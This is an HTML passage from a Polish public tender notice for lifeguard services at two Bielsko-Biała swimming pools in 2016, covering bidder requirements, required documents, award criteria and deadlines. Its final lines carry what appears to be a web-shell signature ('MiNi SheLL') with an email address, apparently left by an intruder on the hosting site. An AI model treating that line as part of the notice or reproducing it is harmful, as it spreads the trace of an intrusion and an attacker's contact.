w zakresie odpowiadającym przedmiotowi usług objętych niniejszym zamówieniem (np. ratownik na basenie) w rozumieniu ustawy z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych.

Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu 
oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1, 2.3 i 2.4 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać (potwierdzić), że:
5.1) Posiada opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie niższą niż 
150 000,00 zł. 

Na podstawie oświadczenia wykonawcy o spełnieniu warunków udziału w postępowaniu 
oraz dokumentów, o których mowa w rozdziale VI pkt 2 ppkt 2.1 i 2.5 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Oryginał oferty sporządzonej na Formularzu Ofertowym - stanowiącym Załącznik nr 1 do SIWZ.
2.  Oświadczenie wykonawcy (złożone na formularzu Oferta załącznik nr 1 do SIWZ), że:
1)	W cenie oferty zostały uwzględnione wszystkie koszty niezbędne do całkowitego i efektywnego  wykonania przedmiotu zamówienia i że cena oferty jest ceną ostateczną.
2)	Zamawiający nie będzie ponosił żadnych innych dodatkowych opłat z tytułu realizacji przedmiotu zamówienia.
3)	Zdobyłem/liśmy wszelkie konieczne informacje potrzebne do właściwego wykonania zamówienia oraz sporządzenia oferty.
4)	Zapoznałem/liśmy się z warunkami przetargu zawartymi w specyfikacji istotnych warunków zamówienia wraz z załącznikami i przyjmuje/my te warunki bez zastrzeżeń.
5)	Pozostaje/my  związany/i złożoną przez nas ofertą przez okres 30 dni - bieg terminu rozpoczyna się wraz z upływem terminu składania ofert.
6)	Zobowiązuje/my się wykonać zamówienie w następujących terminach: 
- Pływalnia START od 26.05.2016r. do 11.09.2016r. 
- Pływalnia PANORAMA od  24.06.2016r. do 31.08.2016r. 
7)	Zobowiązuje/my się przeprowadzić pokazy ratownictwa wodnego w trakcie trwania umowy w ilości .......... (należy podać ilość pokazów).
8)	Akceptuje/my bez zastrzeżeń warunki zawarte w załączniku nr 8 do SIWZ (istotne postanowienia umowy) i zobowiązujemy się w przypadku wybrania naszej oferty do zawarcia umowy na wymienionych warunkach określonych w istotnym postanowieniu umowy w miejscu i terminie wyznaczonym przez Zamawiającego; 
9)	Zamówienie zamierzam/y wykonać:
a)	samodzielnie, tj. bez udziału podwykonawców*,
b)	z udziałem podwykonawców, którym powierzę następujące części zamówienia ........................*
( * niepotrzebne skreślić)
10)	Niniejsze zamówienie zamierzam/y realizować:
a)	sami*.
b)	jako podmiot zbiorowy (konsorcjum) reprezentowane następująco*:
                ( *niepotrzebne skreślić)
..... - lider konsorcjum,
..... - członek konsorcjum,
..... - członek konsorcjum.
3. Pełnomocnictwo do podpisania ofert względnie do podpisania innych dokumentów składanych  wraz z ofertą, bądź też do podpisywania umów w imieniu Wykonawcy, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. Wykonawcy wspólnie ubiegający się 
o udzielenie przedmiotowego zamówienia (konsorcja, spółki cywilne itp.) winni ustanowić pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - art. 23 ustawy Pzp. Pełnomocnik konsorcjum, spółki cywilnej itp. winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie
       Z pełnomocnictwa powinien wynikać zakres udzielonego pełnomocnictwa.
4.	Oświadczenie (w oryginale) wykonawcy w trybie art. 44 ustawy Prawo zamówień publicznych o spełnieniu warunków, o których mowa w art. 22 ust. 1 tej ustawy Pzp- wg wzoru stanowiącego załącznik nr 2 do SIWZ.
5. Pisemne zobowiązanie (w oryginale) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, w celu udowodnienia, iż Wykonawca będzie dysponował tymi zasobami w trakcie realizacji zamówienia - w przypadku, gdy wykonawca wskaże, że będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia zdolnościach finansowych lub ekonomicznych innych podmiotów (art. 26 ust. 2b. ustawy Pzp).
UWAGA
Podmioty oddające wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia zobowiązane są precyzyjnie określić, jakie zasoby oddają do dyspozycji wykonawcy (np. wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do wykonania zamówienia, zdolności finansowe lub ekonomicznych) oraz zakres, okres i sposób ich udostępnienia a także charakter stosunków, jaki będzie łączył ich z Wykonawcą.
Jeżeli w trakcie zamówienia nastąpi zmiana podmiotu, na którego zasoby Wykonawca się powołał na zasadach określonych w art. 26 ust.2b ustawy Pzp w celu wskazania spełniania warunków udziału w postępowaniu, o których mowa w SIWZ Wykonawca zobowiązany jest wykazać, że proponowany inny podmiot samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowaniu o udzielenie zamówienia. 
6.  Kserokopia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Ilość zaoferowanych przez Wykonawcę pokazów ratownictwa wodnego w trakcie trwania umowy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający istotne postanowienia umowy zawarł  w załącznik nr 8 do SIWZ. 
2.	Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy w sytuacjach mających charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona oraz co do istotnych postanowień umowy, z ważnych powodów, a w szczególności o ile jest ona konieczna i wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. W szczególności:
a)	Zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą, 
b)	Zmiany osób odpowiedzialnych za bieżące kontakty pomiędzy stronami. W przypadku takiej zmiany Strona poinformuje pisemnie drugą stronę  o tym fakcie.     
c)	Zmiany ilości dni i godzin obsługi ratowniczej oraz terminów rozpoczęcia i zakończenia świadczenia usług określonych w pkt. 1 (roz IV pkt 1 SIWZ) np. w przypadkach związanych ze zmianą w okresie funkcjonowania obiektów. Terminy otwarcia i zamknięcia obiektów odkrytych w szczególności uzależnione są przede wszystkim od panujących warunków atmosferycznych 
i mogą ulec przesunięciu np. w przypadku wystąpienia niekorzystnych warunków atmosferycznych wskazujących na brak frekwencji osób korzystających z pływalni. 
d)	Zmiany terminów określonych w rozdziale IV pkt. 1 mogące ulec przesunięciu / zmniejszeniu 
w przypadku wystąpienia: przestojów i opóźnień zawinionych przez Zamawiającego; działania siły wyższej, mającej bezpośredni wpływ na terminowość świadczenia usługi; działania warunków atmosferycznych mających wpływ na terminowość świadczenia usługi; wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.
e)	Zmiana umowy w zakresie podwykonawstwa na etapie realizacji usługi, za uprzednią zgodą Zamawiającego, o ile nie sprzeciwia się to postanowieniom SIWZ, tj.: powierzenie podwykonawcom innego zakresu usługi niż wskazany w ofercie Wykonawcy, wprowadzenie nowego podwykonawcy, również w przypadku, gdy Wykonawca wskazał w ofercie, że usługę wykona samodzielnie,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.bbosir.bielsko.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bielsko-Bialski Ośrodek Sportu i Rekreacji, Bielsko-Biała 43-300, 
ul. M. Konopnickiej 5 - Dział zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2016 godzina 09:00, miejsce: Bielsko-Bialski Ośrodek Sportu i Rekreacji, Bielsko-Biała 43-300, 
ul. M. Konopnickiej 5 -Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com